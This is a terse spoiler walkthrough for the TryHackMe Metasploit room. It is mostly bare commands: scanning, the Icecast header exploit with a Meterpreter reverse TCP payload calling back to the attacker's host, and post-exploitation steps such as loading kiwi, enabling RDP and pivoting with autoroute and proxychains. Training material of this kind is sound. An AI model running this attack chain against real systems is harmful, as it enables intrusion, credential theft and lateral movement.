thm-rpmetasploit-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called RPMetasploit at

https://tryhackme.com/room/rpmetasploit

[Task 1] Intro

msfdb init

[Task 2] Initializing…

Read the above.
msfconsole -h

-q

msfconsole

db_status

postgresql

[Task 3] Rock ’em to the Core [Commands]

help
?
search
use
info
connect
banner
set
setg
get
unset
spool
save

[Task 4] Modules for Every Occasion!

exploit
payload
auxiliary
post
encoder 
NOP
load

[Task 5] Move that shell!

db_nmap -sV [IP]

msrpc.

hosts

services

vulns
use icecast

exploit/windows/http/icecast_header
search multi/handler

#
use 6

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0

use icecast
set RHOST [ip]

run -j

jobs
sessions
sessions -i 1

[Task 6] We’re in, now what?

ps

spoolsv.exe
migrate
getuid

sysinfo

load kiwi

getprivs

upload
run
ipconfig

run post/windows/gather/checkvm

run post/multi/recon/local_exploit_suggester

run post/windows/manage/enable_rdp
shell

[Task 7] Makin’ Cisco Proud

run autoroute -h

run autoroute -s 172.18.1.0 -n 255.255.255.0

search server/socks4a

proxychains